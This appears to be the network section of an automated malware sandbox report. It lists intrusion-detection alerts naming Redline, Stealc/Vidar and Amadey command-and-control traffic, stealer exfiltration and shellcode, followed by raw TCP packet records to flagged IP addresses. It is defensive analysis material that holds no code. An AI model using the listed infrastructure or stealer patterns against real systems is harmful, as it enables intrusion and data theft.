2024-07-26T17:58:33.224861+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55813	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:19.618658+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49705	80	192.168.2.5	185.215.113.16
2024-07-26T17:58:34.530207+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55822	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:21.135953+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:37.198218+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55833	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:21.837906+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:32.565877+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55811	34.149.100.209	192.168.2.5
2024-07-26T18:00:58.215581+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	56209	80	192.168.2.5	185.215.113.19
2024-07-26T17:56:13.405600+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:02.661072+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	61468	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:23.343485+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55750	34.149.100.209	192.168.2.5
2024-07-26T17:58:42.177889+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55857	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:23.250893+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55750	34.149.100.209	192.168.2.5
2024-07-26T17:58:03.313724+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	443	61468	5.75.212.60	192.168.2.5
2024-07-26T17:58:25.619254+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55772	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:16.713549+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:40.827965+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55850	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:21.224649+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	20.114.59.183	192.168.2.5
2024-07-26T17:57:31.112371+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:56:14.224444+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:12.913756+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	61186	185.215.113.16	192.168.2.5
2024-07-26T17:58:46.107776+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55874	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:44.249160+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55867	443	192.168.2.5	5.75.212.60
2024-07-26T17:56:16.321382+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:20.655179+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:23.340512+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	55750	34.149.100.209	192.168.2.5
2024-07-26T17:57:23.803795+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:56:04.031471+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:56:05.909946+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:13.871102+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:58:48.904442+0200	TCP	2054495	ET MALWARE Vidar Stealer Form Exfil	55885	80	192.168.2.5	77.91.101.71
2024-07-26T17:58:01.953130+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	443	61453	5.75.212.60	192.168.2.5
2024-07-26T17:56:14.978485+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T17:58:31.773509+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55806	443	192.168.2.5	5.75.212.60
2024-07-26T17:57:04.394039+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	61179	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:32.741788+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:57:06.518269+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	61180	185.215.113.19	192.168.2.5
2024-07-26T17:57:38.438713+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	61290	80	192.168.2.5	85.28.47.31
2024-07-26T17:56:05.997773+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:12.910866+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	61186	185.215.113.16	192.168.2.5
2024-07-26T17:56:04.330075+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:07.701592+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	61182	80	192.168.2.5	185.215.113.16
2024-07-26T17:57:28.401024+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9
2024-07-26T17:56:14.224510+0200	TCP	2002725	ET ACTIVEX COM Object Instantiation Memory Corruption Vulnerability MS05-054	80	49704	85.28.47.31	192.168.2.5
2024-07-26T17:57:08.010791+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	61182	80	192.168.2.5	185.215.113.16
2024-07-26T17:58:28.403781+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	55789	443	192.168.2.5	5.75.212.60
2024-07-26T17:58:02.692832+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	61461	142.250.181.227	192.168.2.5
2024-07-26T17:57:29.769531+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	61197	9137	192.168.2.5	185.215.113.9

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 17:56:02.864243031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:02.869163990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:02.869268894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:02.869400978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:02.875159979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:03.505361080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:03.505528927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:03.509869099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:03.534905910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:03.813307047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:03.813469887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:03.815872908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:03.827996969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.031388998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.031471014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.032689095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.032762051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.040330887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.072887897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.257733107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.257872105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.257885933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.257920980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.257981062 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.284957886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.284971952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.285068989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.292498112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.292601109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.294445038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.330075026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.545780897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.546037912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.569919109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.569971085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:04.575195074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575210094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575218916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575227976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575237989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575407028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:04.575421095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.297321081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.297445059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.624747992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.629740953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.855222940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.855264902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.855278969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.855392933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.855408907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.855465889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.855504990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.856050968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856061935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856071949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856089115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856112957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.856139898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.856750011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856761932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856772900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856785059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.856801033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.856848955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.909945965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.909966946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.909979105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.909992933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910201073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910247087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.910247087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.910247087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.910291910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910332918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910345078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910363913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.910381079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.910932064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.910995960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.911022902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911037922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911051035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911079884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.911155939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.911753893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911815882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.911818027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911833048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.911891937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.912041903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.912097931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.912558079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.912614107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.912625074 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.912627935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.912736893 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.912765026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.912820101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.913341045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.913419962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.913424969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.913481951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.917435884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.917448997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.917551994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990324974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990370035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990382910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990437031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990466118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990497112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990566969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990577936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990592957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990602970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990623951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990725040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990739107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990771055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.990797043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.990843058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997226000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997286081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997297049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997343063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997360945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997407913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997419119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997457981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997458935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997469902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997685909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997709990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997728109 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997772932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997783899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997792959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.997809887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997833967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.997963905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998009920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998035908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998045921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998071909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998090982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998133898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998184919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998225927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998239040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998271942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998277903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998282909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.998312950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.998987913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999033928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999049902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.999051094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999080896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.999105930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.999274969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999284983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999294996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999310017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:05.999365091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:05.999365091 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.000022888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000070095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000078917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.000080109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000109911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.000128031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.000241995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000252008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000262022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.000289917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.000318050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.079736948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.079792023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.079803944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.079802990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.079843998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.079983950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.079994917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080004930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080017090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080035925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.080056906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.080329895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080341101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080352068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080363035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080379963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.080413103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.080653906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080665112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080674887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080686092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080697060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.080708027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.080729961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.081084967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.081096888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.081108093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.081119061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.081129074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.081135035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.081167936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.086626053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.086692095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.086692095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.086703062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.086734056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.086860895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.086873055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.086903095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.086929083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087081909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087094069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087104082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087116003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087126017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087131023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087166071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087522030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087533951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087543011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087553978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087565899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087570906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087575912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087587118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087594032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087598085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.087620974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.087637901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.088329077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088340044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088351965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088363886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088376045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088382006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.088413954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.088943958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088970900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.088982105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:06.089015007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089040995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:06.089051962 CEST	80	49704	85.28.47.31	192.168.2.5
